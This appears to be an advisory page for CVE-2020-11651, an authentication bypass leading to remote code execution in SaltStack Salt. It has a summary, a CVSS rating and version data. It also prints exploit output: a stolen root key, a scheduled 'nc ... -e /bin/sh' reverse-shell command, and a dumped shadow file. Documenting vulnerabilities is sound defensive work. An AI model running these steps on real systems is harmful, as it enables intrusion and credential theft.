CVE-2020-11651:
SaltStack Salt RCE
CVE-2020-11651 is a critical authentication-bypass flaw in SaltStack Salt’s salt-master (fixed in 2019.2.4 and 3000.2) where the ClearFuncs method-call handling doesn’t properly validate certain requests, letting a remote attacker access sensitive functions without logging in. It was publicly disclosed in late April 2020 (CVE record published April 30, 2020) and, when exploited, can allow attackers to steal tokens and execute commands on connected Salt minions, leading to remote code execution and full environment compromise (it was also reported exploited in the wild).
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort. [+] Salt version: 3000.1 [ ] This version of salt is vulnerable! Check results below [+] Checking salt-master ($TARGET_IP:$TARGET_PORT) status... ONLINE [+] Checking if vulnerable to CVE-2020-11651... [*] root key obtained: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA= [+] Attemping to execute nc $LHOST $LPORT -e /bin/sh on $TARGET_IP [+] Successfully scheduled job: 20200504153851746472
root:$6$<snip>:18400:0:99999:7::: bin:*:17834:0:99999:7::: daemon:*:17834:0:99999:7::: adm:*:17834:0:99999:7::: lp:*:17834:0:99999:7::: sync:*:17834:0:99999:7::: shutdown:*:17834:0:99999:7::: halt:*:17834:0:99999:7::: mail:*:17834:0:99999:7::: operator:*:17834:0:99999:7::: games:*:17834:0:99999:7::: ftp:*:17834:0:99999:7::: nobody:*:17834:0:99999:7::: systemd-network:!!:18400:::::: dbus:!!:18400:::::: polkitd:!!:18400:::::: sshd:!!:18400:::::: postfix:!!:18400:::::: nginx:!!:18400:::::: named:!!:18400::::::
9.8
Critical risk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Compexity
low
Privileges
none
Authentication
none
Affected
< 2019.2.4, >= 3000, < 3000.2
Patched
2019.2.4, 3000.2